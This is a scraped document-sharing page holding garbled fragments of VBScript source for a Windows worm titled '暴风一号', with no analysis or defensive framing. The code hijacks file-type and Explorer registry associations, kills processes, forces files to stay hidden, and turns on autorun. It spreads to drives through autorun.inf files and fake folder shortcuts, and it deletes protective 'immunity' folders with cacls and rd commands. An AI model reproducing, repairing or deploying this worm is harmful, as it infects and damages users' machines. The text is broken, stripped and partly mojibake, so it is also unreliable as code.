暴风一号源码文档格式.docx
《暴风一号源码文档格式.docx》由会员分享,可在线阅读,更多相关《暴风一号源码文档格式.docx(18页珍藏版)》请在冰豆网上搜索。
%systemroot%\system\"
virusload)
txt"
"
log"
"
ini"
"
inf"
runpath="
%systemroot%\system32\"
param
bat"
cmd"
cmd/cechohi!
i'
mhere!
pause"
reg"
trim(param)&
chm"
hlp"
dir"
left(trim(param),len(trim(param))-3)&
oie"
%programfiles%\internetexplorer\"
omc"
/n,:
:
{20d04fe0-3aea-1069-a2d8-08002b30309d}"
emc"
/n,/e,:
caseelse
ifpredblinstance=truethen
endif
timeout=datediff("
ww"
getinfecteddate,date)-12
iftimeout>
0andmonth(date)=day(date)then
callvirusalert()
callmakejoke(cint(month(date)))
callmonitorsystem()
endselect
endsub
submonitorsystem()
onerrorresumenext:
dimprocessnames,exefullnames
processnames=array("
vbsfullnames=array(getmainvirus
(1))
do
callkillprocess(processnames)
callinvadesystem(getmainvirus
(1),getmainvirus(0))
callkeepprocess(vbsfullnames)
3000
subinvadesystem(virusloadpath,virusasspath)
dimload_value,file_value,ie_value,mycpt_value1,mycpt_value2,hcuload,hcuver,viruscode,version
load_value="
virusloadpath&
file_value="
virusasspath&
%1%*"
ie_value="
oie"
mycpt_value1="
omc"
mycpt_value2="
emc"
hcuload="
hkey_current_user\software\microsoft\windowsnt\currentversion\windows\load"
hcuver="
hkey_current_user\software\microsoft\windowsnt\currentversion\windows\ver"
hcudate="
hkey_current_user\software\microsoft\windowsnt\currentversion\windows\date"
viruscode=getcode
version=1
hostsourcepath=
(1)&
\"
hostfilepath=(0)&
\system\"
foreachdrivein
ifand=1or=2or=3)then
diskvirusname=getserialnumber&
.vbs"
callcreateautorun,diskvirusname)
callinfectroot,diskvirusname)
next
if(virusasspath)=falseor(virusloadpath)=falseor(hostfilepath)=falseorgetversion()<
versionthen
ifgetfilesystemtype(getsystemdrive())="
ntfs"
then
callcreatefile(viruscode,virusasspath)
callcreatefile(viruscode,virusloadpath)
callcopyfile(hostsourcepath,hostfilepath)
callsethiddenattr(hostfilepath)
else
callcreatefile(viruscode,virusasspath)
callsethiddenattr(virusasspath)
callsethiddenattr(virusloadpath)
callcopyfile(hostsourcepath,hostfilepath)
endif
ifreadreg(hcuload)<
>
load_valuethen
callwritereg(hcuload,load_value,"
ifgetversion()<
callwritereg(hcuver,version,"
ifgetinfecteddate()="
callwritereg(hcudate,date,"
ifreadreg("
hkey_local_machine\software\classes\txtfile\shell\open\command\"
)<
file_valuethen
callsettxtfileass(virusasspath)
hkey_local_machine\software\classes\inifile\shell\open\command\"
callsetinifileass(virusasspath)
hkey_local_machine\software\classes\inffile\shell\open\command\"
callsetinffileass(virusasspath)
hkey_local_machine\software\classes\batfile\shell\open\command\"
callsetbatfileass(virusasspath)
hkey_local_machine\software\classes\cmdfile\shell\open\command\"
callsetcmdfileass(virusasspath)
hkey_local_machine\software\classes\regfile\shell\open\command\"
callsetregfileass(virusasspath)
hkey_local_machine\software\classes\\shell\open\command\"
callsetchmfileass(virusasspath)
hkey_local_machine\software\classes\hlpfile\shell\open\command\"
callsethlpfileass(virusasspath)
hkey_local_machine\software\classes\applications\\shell\open\command\"
ie_valuethen
callsetieass(virusasspath)
hkey_classes_root\clsid\{871c5380-42a0-1069-a2ea-08002b30309d}\shell\openhomepage\command\"
hkey_classes_root\clsid\{20d04fe0-3aea-1069-a2d8-08002b30309d}\shell\open\command\"
mycpt_value1then
allsetmycomputerass(virusasspath)
hkey_classes_root\clsid\{20d04fe0-3aea-1069-a2d8-08002b30309d}\shell\explore\command\"
mycpt_value2then
callsetmycomputerass(virusasspath)
callregset()
subcopyfile(source,pathf)
if(pathf)then
pathf,true
source,pathf
subcreatefile(code,pathf)
dimfiletext
setfiletext=(pathf,2,false)
code
else
setfiletext=(pathf,2,true)
subregset()
onerrorresumenext
dimregpath1,regpath2,regpath3,regpath4
regpath1="
hkey_local_machine\software\microsoft\windows\currentversion\explorer\advanced\folder\hidden\nohidden\checkedvalue"
regpath2="
hkey_local_machine\software\microsoft\windows\currentversion\explorer\advanced\folder\hidden\showall\checkedvalue"
regpath3="
hkey_current_user\software\microsoft\windows\currentversion\policies\explorer\nodrivetypeautorun"
regpath4="
hkey_classes_root\lnkfile\isshortcut"
callwritereg(regpath1,3,"
reg_dword"
callwritereg(regpath2,2,"
callwritereg(regpath3,0,"
calldeletereg(regpath4)
subkillprocess(processnames)
setwmiservice=getobject("
winmgmts:
\\.\root\cimv2"
foreachprocessnameinprocessnames
setprocesslist=("
select*fromwin32_processwherename='
processname&
'
foreachprocessinprocesslist
intreturn=
ifintreturn<
0then
cmd/cntsd-cq-p"
vbhide,false
next
subkillimmunity(d)
immunityfolder=d&
if(immunityfolder)then
("
cmd/ccacls"
immunityfolder&
&
/t/e/c/geveryone:
f"
),vbhide,true
cmd/crd/s/q"
immunityfolder),vbhide,true
subkeepprocess(vbsfullnames)
foreachvbsfullnameinvbsfullnames
ifvbsprocesscount(vbsfullname)<
2then
run("
vbsfullname)
subwritereg(strkey,value,vtype)
dimtmps
settmps=createobject("
ifvtype="
strkey,value
strkey,value,vtype
settmps=nothing
subdeletereg(strkey)
strkey
subsethiddenattr(path)
dimvf
setvf=(path)
=6
subrun(exefullname)
dimwshshell
setwshshell=("
exefullname
setwshshell=nothing
subinfectroot(d,virusname)
dimvbscode
vbscode=getcode
vbspath=d&
virusname
if(vbspath)=falsethen
callcreatefile(vbscode,vbspath)
callsethiddenattr(vbspath)
setfolder=(d&
setsubfolders=
foreachsubfolderinsubfolders
sethiddenattr
lnkpath=d&
.lnk"
targetpath=d&
args="
d&
\dir"
if(lnkpath)=falseorgettargetpath(lnkpath)<
targetpaththen
if(lnkpath)=truethen
lnkpath,true
callcreateshortcut(lnkpath,targetpath,args)
subcreateshortcut(lnkpath,targetpath,args)
setshortcut=(lnkpath)
withshortcut
.targetpath=targetpath
.arguments=args
.windowstyle=4
.iconlocation="
%systemroot%\system32\,3"
.save
endwith
subcreateautorun(d,virusname)
diminfpath,vbspath,vbscode
infpath=d&
if(infpath)=falseor(vbspath)=falsethen
strinf="
[autorun]"
vbcrlf&
shellexecute="
virusname&
autorun"
shell\open=′ò
?
a(&
o)"
shell\open\command="
shell\open\default=1"
vbcrlf&
shell\explore=×
ê
′1ü
à
í
÷
(&
x)"
shell\explore\command="
callkillimmunity(d)
callcreatefile(s